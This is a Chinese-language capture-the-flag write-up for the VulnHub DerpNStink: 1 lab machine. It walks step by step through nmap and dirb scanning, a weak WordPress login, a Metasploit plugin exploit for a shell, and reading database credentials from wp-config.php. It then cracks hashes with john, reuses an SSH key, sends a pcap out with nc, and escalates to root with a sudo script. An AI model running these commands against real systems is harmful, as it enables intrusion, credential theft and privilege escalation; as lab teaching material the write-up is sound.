Vulhub DerpNStink: 1靶机详解
项目地址
https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova
实验过程
开启靶机虚拟机
使用nmap进行主机发现,获取靶机IP地址
nmap 192.168.47.1-254
根据对比可知DerpNStink: 1的一个ip地址为192.168.47.170
扫描DerpNStink: 1的操作系统,端口及对应服务
nmap -A -p- 192.168.47.170
发现该靶机开放了21,22,80端口
信息收集
访问网站
没什么有用信息
右键查看源码
翻找得到一个flag
flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
目录扫描
dirb http://192.168.47.170
拼接/weblog/wp-admin/,发现出现跳转,需要对其在hosts文件对域名和IP进行绑定(hosts文件位置:/etc/hosts),再重新访问
尝试弱口令admin admin
登陆成功,并且知道了wordpress的版本为4.6.9
获取shell
使用wpscan扫描网站插件
wpscan --url http://derpnstink.local/weblog
使用msf搜索其插件的历史漏洞
msfconsole
search slideshow
use 1
show options
set rhosts derpnstink.local
set WP_PASSWORD admin
set WP_USER admin
set TARGETURI /weblog
run
shell
python -c 'import pty;pty.spawn("/bin/bash")'
在网站根目录找到了数据库的账号密码
cd /var/www/html/weblog
ls
cat wp-config.php
拼接/php/phpmyadmin/
来到数据库的登录页面
使用刚才的账号密码进行登录
登陆成功
四处翻翻在wordpress—>wp_posts发现了第二个flag
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
点击wordpress—>wp_users,发现了两组账号密码
unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/
将密码写入666.txt文件中,使用john对其进行解密
john 666.txt --wordlist=rockyou.txt
使用第二个用户unclestinky wedgie57登录wordpress
发现该账户为管理员用户
查看/etc/passwd文件,发现了处root用户的其它两个存在shell的用户:stinky 、 mrderp
尝试使用现有的密码分别进行登录,发现使用stinky/wedgie57登录成功
并在桌面发现了第三个flag
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
尝试使用上述账号密码登录ftp,发现登陆成功
翻看每个目录,在ssh目录下发现了key.txt文件
跟套娃一样套了好多ssh目录
下载key.txt
get key.txt
cat kry.txt
看起来像个密钥
赋予权限,利用ssh指定密钥登录
chmod 600 key.txt
ssh -i key.txt stinky@192.168.47.170
失败了,可能是因为证书失效在后面加一段命令-o PubkeyAcceptedKeyTypes=+ssh-rsa
ssh -i key.txt stinky@192.168.47.170 -o PubkeyAcceptedKeyTypes=+ssh-rsa
登录成功
提权
在Document目录下发现一个 pcap 文件,尝试将其下载至本地
利用nc传输文件
目标机器:nc -nv 192.168.47.129 2429 < derpissues.pcap
kali: nc -lvvp 2429 > derpissues.pcap
kali开启一个http服务
python -m http.server
在本机访问,下载pcap文件
扔到wireshark中查看
使用搜索语句
ip.src == 127.0.0.1 && http.request.method == "POST"
得到 了mrderp用户的密码:derpderpderpderpderpderpderp
切换mrderp用户
查看当前权限
查看可利用命令
sudo -l
创建binaries目录以及用户提权的脚本
mkdir binaries
cd binaries
touch derpy.sh
echo '#!/bin/bash' > derpy.sh
echo '/bin/bash' >> derpy.sh
chmod +x derpy.sh
sudo ./derpy.sh
提权成功